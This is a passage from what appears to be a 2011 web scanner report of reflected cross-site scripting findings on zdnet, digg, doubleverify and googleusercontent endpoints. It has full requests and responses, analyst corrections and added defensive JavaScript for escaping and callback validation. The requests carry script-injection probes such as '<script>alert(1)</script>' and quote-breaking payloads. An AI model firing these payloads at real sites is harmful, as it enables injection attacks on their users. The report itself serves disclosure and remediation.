This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Note the context, which the scanner mislabels as plain text between tags: the response is served as application/x-javascript and the reflection is the raw query string inside a /* NO AD TEXT: _QUERY_STRING=... */ block comment. An HTML tag is inert there; the echo would only matter if a */ sequence were reflected unmodified, which the payload shown does not test. The MAC-AD STATUS line shows the value the application actually uses, BEACON='1869889666', which is just the digits of the submitted value, so the exposure is confined to the diagnostic comment. Manually examine the application's behaviour with a */ sequence, and question whether the comment needs to be emitted at all.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=18d698<a>ee8bfb9666e&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:30 GMT
Server: Apache/2.2
Content-Length: 454
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:30:30 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=18d698<a>ee8bfb9666e&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1869889666' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw4.cnet.com::1287985472
...[SNIP]...

2.110. http://mads.zdnet.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e083'%3balert(1)//f482dca7251 was submitted in the PAGESTATE parameter. This input was echoed as 9e083';alert(1)//f482dca7251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=9e083'%3balert(1)//f482dca7251&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:29 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:29:29 GMT

/* MAC ad */<!-- no beacon mappings defined -->;window.CBSI_PAGESTATE='9e083';alert(1)//f482dca7251';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw7.cnet.com::1711409472 2011.05.12.13.29.29 *//* MAC T 0.0.0.0 */

2.111. http://mads.zdnet.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the application's response. The payload cfcb3<a>8a75e829cdc was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. As with the beacon parameter, the scanner's "plain text between tags" classification does not match the response shown: it is served as application/x-javascript and the reflection is the raw query string inside a /* NO AD TEXT: _QUERY_STRING=... */ block comment, where a tag is inert and only a */ sequence could end the comment. The status line confirms the value the application actually uses, SITE='23875829', is the digits of the submitted value; the raw input survives only in the diagnostic comment. Manually test a */ sequence, and prefer removing the comment to escaping it.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2cfcb3<a>8a75e829cdc&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:35 GMT
Server: Apache/2.2
Content-Length: 497
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:29:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2cfcb3<a>8a75e829cdc&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='23875829' PTYPE=
...[SNIP]...
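
The three mads.com.com / mads.zdnet.com findings above (2.108, 2.109, 2.111) come from one diagnostic line: the raw query string written into a comment, an HTML comment in the text/html variant and a /* */ block comment in the JavaScript variant. The following is an added example, not code from the report or from the ad server. It shows which sequence ends each kind of comment, checks the report's own payloads against a naive embedding, and neutralises the terminators. The embedding functions, the leak checkers and the */alert(1)/* probe are constructed for the demonstration; the report does not show how the server treats a */ sequence.

```javascript
// Added example; not the ad server's code. Shows how raw query strings leak out
// of HTML and JavaScript comments and how to neutralise the terminators.

// Constructed inputs taken from the report's requests (2.108 and 2.111).
const HTML_QS = 'CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=130381cf86--><a>0abcf34b1c3';
const JS_QS   = 'GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2cfcb3<a>8a75e829cdc&NCAT=6037%3A13616%3A';
// Hypothetical probe the report did not send: the only way out of a /* */ comment.
const JS_BREAKOUT = JS_QS + '*/alert(1)/*';

// Naive embedding, mirroring the "NO AD TEXT" diagnostic seen in the responses.
function naiveHtmlComment(qs) {
  return `<!-- NO AD TEXT: _QUERY_STRING="${qs}" _REQ_NUM="0" -->`;
}
function naiveJsComment(qs) {
  return `/* NO AD TEXT: _QUERY_STRING="${qs}" _REQ_NUM="0" */`;
}

// Returns whatever a browser would parse as live markup after the comment
// ends. The HTML tokenizer closes a comment at the first "-->" or "--!>"
// following "<!--"; the author's own terminator at the very end leaves ''.
function htmlCommentLeak(html) {
  if (!html.startsWith('<!--')) throw new Error('expected an HTML comment');
  const data = html.slice(4);
  const m = /--!?>/.exec(data);
  if (!m) return '';                 // unterminated: the rest is swallowed, nothing leaks
  return data.slice(m.index + m[0].length);
}

// Same idea for a JavaScript block comment: it ends at the first "*/".
function jsCommentLeak(js) {
  if (!js.startsWith('/*')) throw new Error('expected a block comment');
  const data = js.slice(2);
  const i = data.indexOf('*/');
  return i === -1 ? '' : data.slice(i + 2);
}

// Neutralisers. Collapsing "--" removes every HTML comment terminator
// (including "--!>"); encoding ">" also defuses the abrupt "<!-->" / "<!--->"
// forms. Inside a block comment only "*/" matters; a space breaks it.
function forHtmlComment(s) {
  return String(s).replace(/-{2,}/g, '-').replace(/>/g, '&gt;');
}
function forJsBlockComment(s) {
  return String(s).replace(/\*\//g, '* /');
}

// Walk-through of the report's payloads against both embeddings.
function report() {
  return {
    htmlLeak:   htmlCommentLeak(naiveHtmlComment(HTML_QS)),                  // starts with "<a>": the tag is live
    htmlFixed:  htmlCommentLeak(naiveHtmlComment(forHtmlComment(HTML_QS))),  // ''
    jsTagLeak:  jsCommentLeak(naiveJsComment(JS_QS)),                        // '': "<a>" is inert in a block comment
    jsBreakout: jsCommentLeak(naiveJsComment(JS_BREAKOUT)),                  // starts with "alert(1)": only "*/" escapes
    jsFixed:    jsCommentLeak(naiveJsComment(forJsBlockComment(JS_BREAKOUT))), // ''
  };
}

console.log(report());
```

The checkers deliberately model only the terminator rules, which is all that matters for this sink; the practical remediation remains not to echo the query string, since a diagnostic comment that reflects request data is a reflection point whichever encoder guards it.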

2.112. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers-service.cbsinteractive.com
Path:   /offers/script.sc

Issue detail

The value of the offerId request parameter is copied into the application's response. The payload 43138<script>alert(1)</script>b34b7ff49eb was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response carries no Content-Type header at all, so the browser has to guess the type. If it treats the body as HTML (a direct navigation in a content-sniffing browser), the script tag executes; when the resource is loaded as a script, which is what a path named script.sc suggests, the echoed line is a // comment and the payload is inert. Sending an explicit Content-Type (application/javascript) with X-Content-Type-Options: nosniff, and HTML-encoding or omitting the offer id in the message, closes both cases.

Request

GET /offers/script.sc?offerId=10343138<script>alert(1)</script>b34b7ff49eb HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=90898760.1303940884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90898760.1302257195.1303940884.1303940884.1303940884.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 89
Date: Thu, 12 May 2011 13:28:31 GMT

// Offer id 10343138<script>alert(1)</script>b34b7ff49eb does not exists or is not ACTIVE

2.113. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The scanner reports the value of the url request parameter as copied into a JavaScript rest-of-line comment, and submitted the payload 76cc7%0aalert(1)//24965fd8f38 to break out of that comment with a newline. The input was echoed unmodified, newline included, as
76cc7
alert(1)//24965fd8f38
in the application's response.

The response shown does not support the scanner's context classification or its "Certain" verdict: it is a 400 error served as text/html whose body is plain text with no script element, so alert(1) is reflected as inert text and does not execute. What the response does establish is that the url value is echoed without encoding; a tag-based payload would be needed to show more, and the response also sets X-Content-Type-Options: nosniff and X-XSS-Protection: 1; mode=block, which limit what such a payload can achieve in browsers that honour them.

Remediation detail

Although the response shown is not a script context, the url value is still echoed into the error page without HTML encoding. Encode it (or omit it from the message), and if the same value is ever written into a script, apply JavaScript string escaping as well, since echoing user data within a script context is inherently dangerous and hard to make safe.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml76cc7%0aalert(1)//24965fd8f38&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23ffffff%22,%22ENDCAP_LINK_COLOR%22:%22%23ffc619%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_TEXT_COLOR%22:%22%23ffffff%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23000000%22,%22CONTENT_HEADLINE_COLOR%22:%22%23050c10%22,%22FONT_FACE%22:%22normal+normal+20px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif;%22%7D%7D&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1303087791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.444546987.1303087791.1303087791.1304097769.2

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:33:03 GMT
Expires: Thu, 12 May 2011 13:33:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 116

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml76cc7
alert(1)//24965fd8f38
. HTTP error 400

2.114. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The scanner reports the value of the url request parameter as copied into a JavaScript rest-of-line comment, and submitted the payload ef311%0aalert(1)//395ed2543b7 to break out of that comment with a newline. The input was echoed unmodified, newline included, as
ef311
alert(1)//395ed2543b7
in the application's response.

As in 2.113, the response shown is a 400 error served as text/html whose body is plain text with no script element, so the "rest-of-line comment" classification and the "Certain" verdict are not borne out by the evidence: alert(1) is reflected as inert text and does not execute. The finding that survives is an unencoded reflection of the url value into the error text; the response also carries X-Content-Type-Options: nosniff and X-XSS-Protection: 1; mode=block.

Remediation detail

The response shown is not a script context, but the url value is still echoed into the error page without HTML encoding; encode it or omit it from the message. If the value is ever written into a script, JavaScript string escaping is required as well, since echoing user data within a script context is inherently dangerous and hard to make safe.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xmlef311%0aalert(1)//395ed2543b7&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:33:04 GMT
Expires: Thu, 12 May 2011 13:33:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 126

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/members.xmlef311
alert(1)//395ed2543b7
. HTTP error 400

2.115. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied verbatim into the body of a JSONP response: the name is emitted as given, followed by the call's argument list. The payload a3d0b<script>alert(1)</script>013717e0c3d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that the callback name is not validated, so a request parameter controls the first bytes of a script that other sites load. Note the context: the response is served as text/javascript, so a page that consumes it through a script element gets a syntax error rather than executing HTML, and the tag payload above fires only in a browser that renders the text/javascript response as HTML. The durable fix is to restrict the callback to a dotted identifier (letters, digits, underscore, $ and dots) and to reject anything else rather than echo it.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5362797&plc=61693702&sid=953446&num=5&ver=2&dv_url=http%3A//cdn-bpx.a9.com/amzn/iframe.html%3Fp%3D281%3Blast%3D1094%3Br%3Da834682&callback=__verify_callback_828489752952a3d0b<script>alert(1)</script>013717e0c3d HTTP/1.1
Host: rtb50.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84483/219801/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Thu, 12 May 2011 13:33:54 GMT
Connection: close
Content-Length: 74

__verify_callback_828489752952a3d0b<script>alert(1)</script>013717e0c3d(2)

2.116. http://services.digg.com/1.0/endpoint [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the callback request parameter is copied verbatim into the JSONP response as the name of the function that wraps the JSON result. The payload 6afa2<script>alert(1)</script>f2e9a63b104 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that the callback name is not validated. The response is served as text/javascript, so a page that loads it through a script element gets a syntax error rather than executing HTML, and the tag payload fires only in a browser that renders the text/javascript response as HTML. The fix is to accept only a dotted identifier (letters, digits, underscore, $ and dots) as the callback and to reject anything else.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_067839310271665456afa2<script>alert(1)</script>f2e9a63b104 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Content-Length: 172
X-RateLimit-Current: 54
Etag: "67882ee11f838b332291892eee8b6df3bb578777"
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3488

gig_pc_digg_1305206920623_067839310271665456afa2<script>alert(1)</script>f2e9a63b104({
"count": 0,
"timestamp": 1305207035,
"total": 0,
"stories": []
});

2.117. http://services.digg.com/1.0/endpoint [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the method request parameter is copied into a JSON string in the JSONP error response ("No such method '...' on version 1.0"). The payload 9e48c<script>alert(1)</script>9acc52f72d6 was submitted in the method parameter. This input was echoed unmodified in the application's response.

The reflected tags sit inside a double-quoted JSON string in a text/javascript response, so when the response is consumed as a script they are string content and inert; they render as markup only if a browser treats the response as HTML. The endpoint nevertheless echoes arbitrary input into its error messages without encoding; emitting < and > as \u003c and \u003e in the JSON output removes the exposure however the response is later embedded.

Request

GET /1.0/endpoint?method=story.getAll9e48c<script>alert(1)</script>9acc52f72d6&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_06783931027166545 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 403 Forbidden
Content-Length: 221
X-RateLimit-Current: 37
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3511

gig_pc_digg_1305206920623_06783931027166545({
"status": 403,
"timestamp": 1305207012,
"message": "No such method 'story.getAll9e48c<script>alert(1)</script>9acc52f72d6' on version 1.0",
"code": 1052
});

2.118. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JSON string in the JSONP error response ("Unknown argument ..."). The payload 9033a<script>alert(1)</script>25ba0b9de6c was submitted as the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

As in 2.117, the reflected tags sit inside a double-quoted JSON string in a text/javascript response: inert when consumed as a script, markup only if a browser treats the response as HTML. The error message should not carry unencoded client input; emitting < and > as \u003c and \u003e in the JSON output removes the exposure regardless of how the response is embedded.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_06783931027166545&9033a<script>alert(1)</script>25ba0b9de6c=1 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 403 Forbidden
Content-Length: 194
X-RateLimit-Current: 84
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3452

gig_pc_digg_1305206920623_06783931027166545({
"status": 403,
"timestamp": 1305207071,
"message": "Unknown argument 9033a<script>alert(1)</script>25ba0b9de6c",
"code": 1001
});
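
Findings 2.115 through 2.118 are one pattern on two JSONP endpoints: the callback name is emitted verbatim (2.115, 2.116) and client input is quoted inside a JSON string in the error message (2.117, 2.118), in responses served as text/javascript. The example below is added here and is not the code of doubleverify.com or digg.com; it shows the callback-name check and the JSON encoding such an endpoint should apply, using the report's reflected values as constructed inputs. The function names, the 128-character limit, the /**/ prefix and the response shape are assumptions made for the demonstration.

```javascript
// Added example; not the code of doubleverify.com or digg.com.
// A JSONP endpoint that validates the callback and emits JSON that stays
// inert even if the response is rendered as HTML or inlined in a <script>.

// A JSONP callback is a dotted JavaScript identifier path and nothing else.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const CALLBACK_MAX = 128; // assumed limit

function validCallback(name) {
  return typeof name === 'string' && name.length <= CALLBACK_MAX && CALLBACK_RE.test(name);
}

// JSON.stringify leaves < > & U+2028 U+2029 as-is. Emit them as \uXXXX so a
// "<script>" inside a message (finding 2.117) can never become markup and the
// literal stays valid if inlined. JSON.parse still round-trips the result.
function safeJson(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Builds the response. An invalid callback is never echoed; the error body is
// plain JSON with a fixed message. The leading "/**/" keeps the first bytes of
// every 200 response identical, and nosniff stops content-type confusion.
function jsonp(callback, payload) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
  };
  if (!validCallback(callback)) {
    return { status: 400, headers, body: safeJson({ status: 400, message: 'invalid callback' }) };
  }
  return { status: 200, headers, body: `/**/${callback}(${safeJson(payload)});` };
}

// Constructed inputs: the callback names and the error message from the report.
const GOOD_CALLBACK = 'gig_pc_digg_1305206920623_06783931027166545';
const BAD_CALLBACK  = GOOD_CALLBACK + '6afa2<script>alert(1)</script>f2e9a63b104';
const ERROR_PAYLOAD = {
  status: 403,
  message: "No such method 'story.getAll9e48c<script>alert(1)</script>9acc52f72d6' on version 1.0",
  code: 1052,
};

console.log(jsonp(GOOD_CALLBACK, { count: 0, stories: [] }).body);
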